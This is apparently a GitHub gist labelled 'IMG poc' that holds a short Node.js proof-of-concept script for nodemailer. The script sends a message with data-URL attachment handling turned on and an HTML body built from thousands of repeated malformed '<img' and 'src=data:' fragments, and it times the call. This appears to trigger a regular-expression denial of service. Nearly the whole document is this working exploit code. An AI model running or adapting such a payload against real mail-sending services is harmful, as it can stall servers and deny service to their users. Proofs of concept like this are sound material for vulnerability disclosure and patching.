Created
January 31, 2024 02:19
-
-
Save francoatmega/9aab042b0b24968d7b7039818e8b2698 to your computer and use it in GitHub Desktop.
IMG poc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* eslint no-console: 0 */ | |
'use strict'; | |
const nodemailer = require('../lib/nodemailer'); | |
async function main() { | |
// Create a SMTP transporter object | |
let transporter = nodemailer.createTransport({ | |
sendmail: true, | |
newline: 'windows', | |
logger: false | |
}); | |
// Message object | |
let message = { | |
attachDataUrls: [ | |
'http://localhost:3000/1', | |
], | |
from: 'Andris <[email protected]>', | |
// Comma separated list of recipients | |
to: 'Andris Reinman <[email protected]>', | |
bcc: '[email protected]', | |
// Subject of the message | |
subject: 'Nodemailer is unicode friendly ✔', | |
// plaintext body | |
text: 'Hello to myself!', | |
// HTML body | |
html: '"<img;'.repeat(809) + ' c' + ' src=data:r'.repeat(1000), | |
}; | |
console.time('POC - IMG file') | |
let info = await transporter.sendMail(message); | |
console.timeEnd('POC - IMG file') | |
console.log('Message sent successfully as %s', info.messageId); | |
} | |
main().catch(err => { | |
console.error(err.message); | |
process.exit(1); | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment